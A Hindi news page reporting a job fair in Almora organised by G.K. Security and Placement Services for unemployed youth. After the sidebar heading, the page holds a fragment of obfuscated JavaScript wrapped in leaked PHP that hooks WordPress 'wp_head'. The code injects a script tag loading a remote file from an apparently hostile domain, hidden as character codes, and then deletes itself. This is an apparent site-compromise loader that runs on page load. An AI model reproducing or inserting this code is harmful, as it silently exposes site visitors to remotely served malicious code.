Saturday, July 27, 2024
spot_img

अल्मोड़ा :जी .के. सिक्योरिटी एंड प्लेसमेंट सर्विसेज ने किया रोजगार मेले का आयोजन

अल्मोड़ा ::- अल्मोड़ा में बेरोजगारी से जूझ रहे युवाओं को रोजगार उपलब्ध कराने के लिए बिट्टू कर्नाटक द्वारा जी.के. सिक्योरिटी एंड प्लेसमेंट सर्विसेज से आग्रह किया गया था। जिसे उनके द्वारा सहर्ष स्वीकार करते हुये एक रोजगार मेला कर्नाटक के कैम्प कार्यालय निकट टाटा मोटर्स कर्नाटक खोला अल्मोड़ा में आयोजित किया गया। जिसमें भारी संख्या में युवाओं ने प्रतिभाग किया। युवाओं को रोज़गार पाने का एक सुनहरा अवसर प्राप्त होने से काफी उत्साह था। रोज़गार मेले में लगभग 125 से अधिक युवाओं को सिक्योरिटी गार्ड, 20 से अधिक युवाओं को सुपरवाइजर और 20 से अधिक युवाओं को तकनीकी कार्यों के लिए रोजगार देने का प्रयास किया गया। इस कार्यक्रम में ऑपरेशन मैनेजर रजनीश कर्नाटक और स्वराज शर्मा का विरोष योगदान रहा।

उत्तराखंड राज्य में आज युवा बेरोजगारी का दंश झेल रहा है और उच्च शिक्षा प्राप्त करने के बाद भी छोटे-छोटे रोजगार के लिए तरस रहे हैं। कर्नाटक ने कहा कि यह रोजगार छोटा अवश्य है लेकिन बेरोजगारी में एक दिशा देने का कार्य करेगा। यथाशीघ्र भैंसियाछाना विकासखंड के बाडेछीना, धौलछीना, सेराघाट में भी कुछ रोजगार मेले लगाकर जरूरतमंद युवाओं को इस कार्य से जोड़ने का वे प्रयास करेंगे। उन्होंने इस कार्य में सहयोग देने वाले सभी सहयोगियों एवं बाहर से आए हुए अतिथियों का आभार व्यक्त करते हुए उन्हें धन्यवाद दिया और आश्वस्त किया कि भविष्य में भी इसी प्रकार से छोटे-छोटे कार्य करने का प्रयास किया जाता रहेगा। बेरोजगार युवाओं ने कर्नाटक की इस नयी मुहिम के लिए उनकी सराहना करते हुए कहा कि उनकी यह पहल बेरोजगार युवाओं को एक नया आयाम देगी।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>